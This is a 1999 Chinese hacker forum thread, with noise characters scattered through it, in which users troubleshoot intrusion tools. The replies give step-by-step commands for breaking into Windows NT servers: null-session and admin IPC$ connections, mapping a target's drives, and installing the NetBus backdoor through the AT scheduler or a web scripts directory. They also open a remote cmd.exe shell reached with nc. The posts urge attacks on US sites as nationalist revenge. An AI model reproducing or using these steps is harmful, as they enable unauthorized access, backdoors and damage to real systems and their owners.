《版主页黑客工具和文章的几个问题》中提到:6 I( |! F3 Z" b, ?
请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
& ^9 Z5 {) ^: G% v& |+ w% K/ `1 h7 o. G> 我的机子MMX166,WIN98,2。5G,32M内存。
6 o$ t' X/ A% M2 S9 U; u+ w6 S
3 M" k( N+ T1 G' E8 T黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。$ K: ]# Z8 s# O+ e
你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。. v; V* `9 {2 c& }% U
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:! I! f5 ?; q; o7 }& m
net use \\111.111.111.111\ipc$ "" /user:""8 e5 W. u5 r; E, x N. O; q3 }
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:& W( [! k, R, W+ j8 g2 \
net view \\111.111.111.111+ h B! k9 N5 A% |7 T( a
当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:1 ~& h" F; d2 L$ w- x8 d; i
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"% u" C" ^& \7 @; N2 K1 Q6 c1 O
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改: ?& N6 x# E# w9 S
1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:6 U9 i$ t# o7 V! T/ _
net use x: \\111.111.111.111\c$
* K1 u/ Q( l. h t T1 [8 r% mnet use y: \\111.111.111.111\d$
5 P! X' W' i9 Z4 D这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
2 N' {/ i. {: c2 I! L+ O( v6 M2、管理目标NT的用户:
0 \2 L- e9 p0 q8 {( i$ g8 A从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”; D' _* C1 \- c: d: a
键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样) v2 n Z9 \ @# Y& g" P6 o( I
3、管理目标NT的服务
: ~3 q0 S6 _9 Q& U$ u5 @选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”# F( ^1 r1 b* r% o- t2 v
这样你可以管理目标NT上的服务,共享目录
1 y, e8 U! a' I4、IIS管理
/ S* L5 B1 n3 L选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111/ ^- t' q- l3 k) I/ p( h
目标NT的FTP、WWW服务你就可以重新配置
8 ^% l. V3 A3 e T3 J) Z! r5、事件管理
$ n; i. S4 Y8 A2 a- E“事件查看器”->连接到服务器->111.111.111.111, E1 D" g' u2 A% x) A, ]' m/ k6 c+ {
+ f. x2 \! S* W- U J4 ~还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。" z* {' q: R' \1 i* [
/ ~0 ?1 T- D) P1 o( S当然,98,95也能做一些事情,但很麻烦,比如:
. ? J9 h% x0 rnet use \\111.111.111.111\ipc$; x+ {) Z% P4 H
net use z: \\111.111.111.111\d$1 Q* a" w. P) }! X% c& T
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
& r# z3 N0 x% B2 V* X9 v" a o! v
) I. A k" g0 o/ L5 I9 B我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!
2 d/ H; w X1 z, f这样,你还可以了解目标机器上能有什么东东供你去用!+ `% q' n& c+ i2 F: V
6 q# F p0 ~+ ?& {+ l8 F7 ~
+ |6 C7 o3 j& p+ y& J- `. S$ C--------------------------------------------------------------------------------
% E1 J: F- [ _5 |) V. m: p& [
' V+ D v& _+ ?' q+ h+ h o; V>quack于1999-06-12,23:37:448 a+ c* J5 K! F3 Y9 E: @ P
在大作《几个有关黑的问题》中提到:/ v+ n C) i/ ?* ?1 x2 h$ I8 X! V" ~
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。
5 ]( P& O3 W+ J! H7 ]
( K1 F4 ~5 x- `2 G( p. o6 Rkillusa于1999-06-13,03:25:15
% A( a: ?9 J5 v0 {7 @8 i2 y& r在大作《Re: 几个有关黑的问题》中提到:7 C: @6 [8 `" d: W; n: E8 b a* \- b
, V2 u! J& F6 o& h2 l' a
letmein.exe 暂时没有mypwd参数,十分抱歉& _% O) }. i' T" @; X( |
pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。6 y# E4 a6 h4 L7 F' m- o) r9 b
6 h4 Z0 \( S) B8 S) d6 _
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的
( _- j- a/ o7 M3 q, j9 Z# ?" ~服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:, v6 R& _; P3 g2 N
# _. H+ B. }' Z; l; Y7 |1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:
. [. w% ?% ]' s/ E9 b1 h" _
' Q4 U/ k% Y, a+ x5 H, c. L! J: vC:\>net start schedule
1 i" U2 h2 `4 L" v2 jSchedule 正在启动服务.....
N6 |6 ^# x* L2 W) q6 S/ s, ~Schedulw 服务启动成功。
7 }0 v9 N+ N1 [2 }) aC:\>at /?
2 U' {- p$ c* Z2 u! Y+ i! oAT 命令排定在特定的日期和时间运行某些命令和程序。
, K3 c; \; o& ~3 A运行 AT 命令之前必须先启动 Schedule 服务。
9 c, u6 A5 @- N5 A7 l; V7 j5 G# w
# a8 X/ [0 w! t% B/ M/ m# x7 XAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]: w% T g9 d) F/ B, m
AT [\\computername] time [/INTERACTIVE]
" g$ v& U. G. N+ R[ /EVERY:date[,...] | /NEXT:date[,...]] "command"& l7 \0 N" h' ^- Y
$ }3 @& V' b/ l* y
\\computername 指定远程计算机。 如果省略这个参数
, q: Z+ @9 G9 W# Z命令会被排定在本机上运行。 ~1 W9 Y+ S4 Y8 g; H6 _: u5 N
id 指定给排定进度命令的识别号。
! T4 z3 e4 |3 `6 a+ w4 m! j2 m& O3 e0 P
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。
- O5 A8 q# o( w0 K/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。, B* n4 a z8 q+ r
time 指定命令运行的时间。
4 }/ u1 n" g- K% Y/interactive 允许作业在运行时,与用户通过桌面交互。
2 q8 {, U; ~% Y: h2 S4 w3 j; t9 D# I! E. ~
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
$ O$ j- s9 Y& b! _8 q/ n如果省略日期,则默认为在每月的本日运行。
4 S! z1 g; j1 i6 A$ b8 z0 o$ k& I. z+ {' P5 H8 p) P* |& K3 ^; V
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。# \. N" K+ ~+ K6 a4 a
" U: ~ ?& P8 R& K/ A
"command" 准备运行的 Windows NT 命令或批处理文件。
/ }* S& f/ r1 e. ]
9 M( l( n y4 Y( rC:\>
) ?) D$ @* X7 W! `$ f
3 X% W/ Z9 w( e: ^9 `* ~( ?知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:0 B. ~8 s8 @4 M$ r* E4 n
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"8 J- m i7 X0 d
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start$ N8 V3 {* j' m6 [
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:$ W& [5 o) D# X$ D9 q8 O
at \\x.x.x.x 00:00 ntsrv.exe /port:643211 t$ T2 K. b: x' F
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:: p, E" z: ]3 I7 j# }1 N/ O
Microsoft(R) Windows NT(TM)! n- c) T" |) g* D! w( X9 a8 N
(C) Copyright 1985-1996 Microsoft Corp.0 ~* o! S, P# i& d+ i
C:\>6 p6 M6 g( @! T: k0 A. I
& K, M6 t, ?( x7 H: P2、利用web启动ntsrv.exe或其他程序在目的服务器
: K+ g3 @" R+ s3 C/ h5 C3 f$ _" W& ?. M+ c7 {" R* E
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
% H% W8 z- j6 u7 l* I0 Hhttp://x.x.x.x/scripts/ntsrv.exe /port:64321
# s e% l" d: y: u' S% n' C或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
$ ?! E& g+ G2 W7 L该程序就启动了% i: u Z! n5 k8 m- L% Z
7 q3 W" J: }- ^% r
我只提这几中方法!
. N" F: \( I0 H. S d要成功,必须打好基础工,对操作系统充分了解!* i, j! A3 y* t" k' d
5 ?2 B# O" p/ v |